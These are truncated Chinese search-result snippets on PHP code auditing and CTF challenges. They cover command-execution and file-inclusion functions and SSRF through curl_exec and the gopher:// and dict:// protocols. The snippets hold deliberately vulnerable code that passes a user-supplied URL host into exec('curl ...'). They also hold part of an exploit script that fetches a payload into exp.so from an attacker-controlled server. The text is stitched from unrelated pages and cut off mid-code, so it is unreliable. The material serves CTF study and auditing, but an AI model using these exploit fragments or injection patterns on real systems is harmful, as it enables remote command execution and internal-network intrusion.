proc_open() 执行一个命令,并且打开用来输入/输出的文件指针 pcntl_exec() 在当前进程空间执行指定程序 popen() 打开进程文件指针 反引号,实质上还是调用的shell_exec()函数,在CTF题目里面有的时候会忘记过滤导致直接拿到flag 文件包含的危险函数 php中包含的函数一共有四个,主要作用为包含并运行指...
除了上面提到的标准库函数,很多常见的PHP扩展也提供了一些可以读取文件的函数。例如,php-curl扩展(文件内容作为HTTP body)涉及文件存取的库(如数据库相关扩展、图片相关扩展)、XML模块造成的XXE等。这些通过外部库函数进行任意文件读取的CTF题目不是很多,建议对涉及的题目进行实例分析。与其他语言不同,PHP向用户提...
PHP-CTF-Docker /day2 代码: <?php$url=$_GET['url'];if(isset($url) && filter_var($url,FILTER_VALIDATE_URL)){$site_info=parse_url($url);print_r($site_info);if(preg_match('/sec-redclub.com$/',$site_info['host'])){exec('curl "'.$site_info['host'].'"',$result);echo'c...
$output=curl_exec($ch); curl_close($ch); return $output; } public function __destruct(){ $this_is_a_easy_test=unserialize($_GET['careful']); if($this_is_a_easy_test->funny_get() === '1'){ echo $this->curl($this->url); } } } if(isset($_POST["submit"])) { $chec...
$result = curl_exec($ch); curl_close($ch); file_put_contents("exp.so",$result); } Curl(""" + pay + """); '''.strip() data = { 0: payload } r = requests.post(url, data, headers=headers).text print(r) 可以看到vps这边有一个记录: 此时...
这道CTF题目,实际上考察的是filter_var函数的绕过与远程命令执行。在题目第6行,程序使用exec函数来执行curl命令,这就很容易让人联系到命令执行。所以我们看看用于拼接命令的$site_info['host']从何而来。在题目第2-4行,可以看到$site_info变量是从用户传来的url参数经过filter_var和parse_url两个函数过滤而来。之...
在这题CTF中,攻击的关键点在于:curl_exec($ch) [ 复制代码 ](javascript:void(0); "复制代码") function upload_please_by_url($url) { if ( 1 === preg_match( ' ^[a-z]{3,5}://# ' , $url)) # Is URL? { $ch = curl_init( ch, CURLOPT_RETURNTRANSFER...
当然PHP底下经常可能会出现SSRF漏洞的主要有几个函数,它们分别是file_get_contents()、fsockopen()、curl_exec()、get_headers()。通过全文关键函数搜索,在看是否限制了访问端口,访问协议,内网ip地址等。利用file://、http/https:// 、dict://、gopher://协议去搞内网。
$response = curl_exec($ch); curl_close($ch); return strlen($response); } $url="http://127.0.0.1/test.php"; for ($i=0; $i <=128 ; $i++) { for ($j=0; $j <=128 ; $j++) { $data="CTF".urlencode(chr($i))."SHOW".urlencode(chr($j))."COM"."=123"; ...
curl_exec() //默认不跟踪跳转, file_get_contents() // file_get_contents支持 php://input协议 各种绕过,我就不在这说了。 6.2.5. XML外部实体注入 审计要素 参数是否用户可控 是否libxml版本为2.9.0以上 是否禁用了外部实体 这个一般我关注的少,仅仅是搜索“DOMDocument”,“SimpleXMLElement”和“simplexml...